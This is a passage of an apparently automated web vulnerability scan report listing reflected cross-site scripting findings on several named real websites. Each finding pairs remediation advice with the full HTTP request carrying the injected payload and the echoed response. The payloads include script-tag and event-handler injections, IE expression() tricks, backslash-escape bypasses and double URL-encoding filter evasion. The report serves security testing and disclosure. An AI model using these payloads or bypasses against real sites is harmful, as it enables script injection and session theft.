Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjU3OjM3LVVUQw%3D%3D&po=0&pp=dir5fb41; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:57:37 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:57:37 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 60166


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<title>Im
...[SNIP]...
ds_recieved= '';
google_language = '';
google_country = '';
google_encoding = 'utf8';
google_safe = 'high';
google_adtest = 'off';
google_hints = '68661\\';ad7a82f13fb';
google_kw = '68661\\';ad7a82f13fb';
google_kw_type = 'broad';

var oScript = document.getElementById('bannerAd_ctrScript');

oScript.setAttribute('fSecondCall',
...[SNIP]...

2.142. http://www.ask.com/web [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f84\'%3ba552257ac42 was submitted in the q parameter. This input was echoed as 41f84\\';a552257ac42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /web?q=What+causes+brain+freeze%3F41f84\'%3ba552257ac42&gc=1&qsrc=3045&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Sat, 20 Nov 2010 16:59:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:59:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..|V2hhdCtjYXVzZXMrYnJhaW4rZnJlZXplJTNGNDFmODQlNUMlMjclM0JhNTUyMjU3YWM0Mg..; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU5OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:26 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 80820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - What's Yo
...[SNIP]...
google_safe = 'medium';
google_adtest = 'off';

google_ad_section = 'default';

google_page_url = '';


google_hints = 'What causes brain freeze?41f84\\';a552257ac42';
google_kw = '';


google_kw_type = 'broad';

}else{

google_ad_client = 'aj-cat';
google_ad_channel = 'health-diseases';
googl
...[SNIP]...

2.143. http://www.ask.com/web [qid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The value of the qid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 558cb'%3balert(1)//ec1d53be65e was submitted in the qid parameter. This input was echoed as 558cb';alert(1)//ec1d53be65e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /web?q=los+angeles+it+consulting&qsrc=0&frstpgo=0&o=0&l=dir&qid=38FDBEE5438F532FB16A69B271896D79558cb'%3balert(1)//ec1d53be65e&page=2&jss= HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:09:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:09:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjA5OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:09:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:09:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 122746


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - What's Yo
...[SNIP]...
<script type="text/javascript">
var _psBack = '&#171;&#160;Prev';
var _psForward = 'Next&#160;&#187;';
var _psQueryID = '38FDBEE5438F532FB16A69B271896D79558cb';alert(1)//ec1d53be65e';
var _psQuerySource = '0';
var _psSiteID = '';
</script>
...[SNIP]...

2.144. http://www.avalanchepub.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.avalanchepub.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f00b'style='x:expression(alert(1))'d02eb00d6bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?2f00b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d02eb00d6bf=1 HTTP/1.1
Host: www.avalanchepub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:57:24 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114343939:73686F702D6A6176613031352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=GTTfMyMGWWvFGL5lvP1q13vcWfhXMbqLwLJQ4nj4pfy6VvLDx5Wgn5TSn7fw52RNJJ7V60vmL4W1pnFV6ShJ95QX1hcG3SzVpF3P4hHymRlNQ35LpTT3ljhGGnddcJMw!1743587914; path=/
Set-Cookie: NLVisitorId=rnoX2rlXAYfybmPd; domain=.avalanchepub.com; expires=Friday, 11-Nov-2011 17:57:24 GMT; path=/
Set-Cookie: NLShopperId2=rnoX2rlXAY3ybt50; domain=.avalanchepub.com; expires=Saturday, 27-Nov-2010 17:57:24 GMT; path=/
Set-Cookie: NS_VER=2010.2.0; domain=www.avalanchepub.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=983
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 34834


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - AVALANCHE</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.avalanchepub.com/?2f00b%27style%3d%27x%3aexpression%28alert%281%29%29%27d02eb00d6bf=1&2f00b'style='x:expression(alert(1))'d02eb00d6bf=1'>
...[SNIP]...

2.145. http://www.dcgla.com/includes/testimonial.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcgla.com
Path:   /includes/testimonial.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 976ff"><script>alert(1)</script>da45883e2da was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/testimonial.php?id=dtb976ff"><script>alert(1)</script>da45883e2da HTTP/1.1
Host: www.dcgla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=245246864.1290271625.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=los%20angeles%20it%20consulting; ClickAndChat.com=109-1290271668886; __utma=245246864.1301270426.1290271625.1290271625.1290271625.1; __utmc=245246864; __utmb=245246864.4.10.1290271625;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Dependable Computer Guys</title>
<LINK REL=StyleSheet HREF="../style.css" TITLE="DCGStyle" TYPE="text/
...[SNIP]...
<img src="../images/testimonial_dtb976ff"><script>alert(1)</script>da45883e2da.gif" border="0" usemap="#tmap">
...[SNIP]...

2.146. http://www.dcgla.com/includes/testimonial.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcgla.com
Path:   /includes/testimonial.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e32d"><script>alert(1)</script>8b1a40d7583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/testimonial.php?id=cityse/2e32d"><script>alert(1)</script>8b1a40d7583arch HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.dcgla.com
Cookie: __utma=245246864.1301270426.1290271625.1290271625.1290271625.1; __utmb=245246864.3.10.1290271625; __utmc=245246864; __utmz=245246864.1290271625.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=los%20angeles%20it%20consulting; ClickAndChat.com=109-1290271668886

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Dependable Computer Guys</title>
<LINK REL=StyleSheet HREF="../style.css" TITLE="DCGStyle" TYPE="text/
...[SNIP]...
<img src="../images/testimonial_cityse/2e32d"><script>alert(1)</script>8b1a40d7583arch.gif" border="0" usemap="#tmap">
...[SNIP]...

2.147. http://www.directpointe.com/support/esupport_login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /support/esupport_login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6ba"><script>alert(1)</script>9eb03b16144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1 HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25395


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input type="hidden" name="errorURL" value="http://www.directpointe.com/support/esupport_login.aspx?dc6ba"><script>alert(1)</script>9eb03b16144=1" />
...[SNIP]...

2.148. http://www.lang.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lang.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec76c'style='x:expression(alert(1))'9dd576fad79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /?ec76c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279dd576fad79=1 HTTP/1.1
Host: www.lang.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:58:02 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1114439413:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=MNZBMyMKys1npvWM35GnBMSwFw9BFmx3HjChJvjBND19vT21VTM9x3CvKGSXhHxj6dfzbtvp5mvrtzyvDnRwzTvqYGhM1CMQtYs9QhSGNGJhp3k2QLyfSR6QnQJGNhpn!-991854023; path=/
Set-Cookie: NLVisitorId=rnoX2rlXATOHb8rE; domain=.lang.com; expires=Friday, 11-Nov-2011 17:58:03 GMT; path=/
Set-Cookie: NLShopperId=rnoX2rlXATaHbzKG; domain=.lang.com; expires=Saturday, 27-Nov-2010 17:58:03 GMT; path=/
Set-Cookie: NS_VER=2010.2.0; domain=www.lang.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=885
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41318


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wall Calendars, Monthly Planners, Decorative Stationery & Gifts by LANG</title>


<meta name="robots" content=
...[SNIP]...
<input type='hidden' name='referer' value='http://www.lang.com/?ec76c%27style%3d%27x%3aexpression%28alert%281%29%29%279dd576fad79=1&ec76c'style='x:expression(alert(1))'9dd576fad79=1'>
...[SNIP]...

2.149. http://www.makeitwork.com/about/press-releases [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /about/press-releases

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4d65"><script>alert(1)</script>3048996d15f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /about/press-releases?f4d65%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3048996d15f=1 HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 20 Nov 2010 17:20:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<link href="/about/press-releases?f4d65"><script>alert(1)</script>3048996d15f=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

2.150. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed was submitted in the REST URL parameter 3. This input was echoed as f614c';alert(1)//c73f4c1f2ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /plugins/system/rokboxf614c%2527%253balert%25281%2529%252f%252fc73f4c1f2ed/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
           'height'            : 650,
//            'scrolling'            : 'no'
//        });
//        
//        $("#embed").click(function(){
//            $(this).focus().select();
//            //clip.setText($(this).val());
//            return false;
//        });

       if('Rokboxf614c';Alert(1)//C73f4c1f2ed') {
           var pattern = /Rokboxf614c';Alert(1)//C73f4c1f2ed/i;
           $(".services_header").filter(function(){
               var string = $(this).text();
               var found = pattern.test(string);
               if(found) {
                   $("d
...[SNIP]...

2.151. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a42c5%253balert%25281%2529%252f%252fa87db967c5e was submitted in the REST URL parameter 3. This input was echoed as a42c5;alert(1)//a87db967c5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /plugins/system/rokboxa42c5%253balert%25281%2529%252f%252fa87db967c5e/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
/        
//        $("#embed").click(function(){
//            $(this).focus().select();
//            //clip.setText($(this).val());
//            return false;
//        });

       if('Rokboxa42c5;Alert(1)//A87db967c5e') {
           var pattern = /Rokboxa42c5;Alert(1)//A87db967c5e/i;
           $(".services_header").filter(function(){
               var string = $(this).text();
               var found = pattern.test(string);
               if(found) {
                   $("div[id^=m_], div[id^=s_]").css('display', 'none');
                   re
...[SNIP]...

2.152. http://www.makeitwork.com/plugins/system/rokbox/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.makeitwork.com
Path:   /plugins/system/rokbox/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a was submitted in the REST URL parameter 3. This input was echoed as d26ef</title><img src=a onerror=alert(1)>d4c62d3506a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /plugins/system/rokboxd26ef%253c%252ftitle%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed4c62d3506a/ HTTP/1.1
Host: www.makeitwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=246358936.1290271612.1.1.utmgclid=CNTcksnsr6UCFRhg2godlBHrYA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; 8402d15662a4628733f3ad434ce06140=2na2t369v9umvdqdqv92diae06; __utma=246358936.1337497436.1290271612.1290271612.1290271612.1; __utmc=246358936; __utmb=246358936.1.10.1290271612;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:20:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
